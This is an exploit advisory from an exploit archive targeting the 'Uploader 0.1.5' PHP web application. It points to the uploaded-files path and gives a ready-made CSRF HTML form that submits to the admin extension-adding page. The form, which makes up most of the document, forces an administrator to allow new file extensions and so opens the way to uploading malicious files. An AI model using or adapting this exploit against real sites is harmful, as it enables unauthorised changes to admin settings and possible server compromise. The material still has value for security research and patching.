Uploader v0.1.5 Multiple Vulnerabilities

========================================
Uploader v0.1.5 Multiple Vulnerabilities
========================================

========================================================================================                 
| # Title    : Uploader 0.1.5 Mullti Vulnerability           
| # Author   : indoushka                                                              
| # email    : [email protected]                                                  
| # Home     : www.iqs3cur1ty.com                                                                                                                                                                                                              
| # Script   : Powered by Uploader 0.1.5   
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)      
| # Bug      : Mullti
| # Download :                                                                      
======================      Exploit By indoushka       =================================
 # Exploit  :
  
 1- http://127.0.0.1/upload/
  
  http://127.0.0.1/upload/files/ ( File Name )
   
 2- Add Extensions CSRF Exploit :
  
 <FORM METHOD=POST ACTION="http://127.0.0.1/upload/admin/admin_extensions_add.php" ENCTYPE="multipart/form-data">
 <table width="99%" cellpadding="4" cellspacing="1" border="0" align="center">
 
 <tr>
        <td align="right" valign="middle"><span class="gen"><? echo($lang['Disallow_extension']); ?></span></td>
        <td align="left" valign="middle"><input type="text" size="20" maxlength="100" name="extension" value="" /></td>
 </tr>
 </table>
 <br />
<center>
<input type="submit" name="submit" value="<? echo($lang['Submit']); ?>" class="mainoption" />&nbps;&nbps;<input type="reset" value="<? echo($lang['Reset']); ?>" class="liteoption" />
</center>
</FORM>



#  0day.today [2018-01-10]  #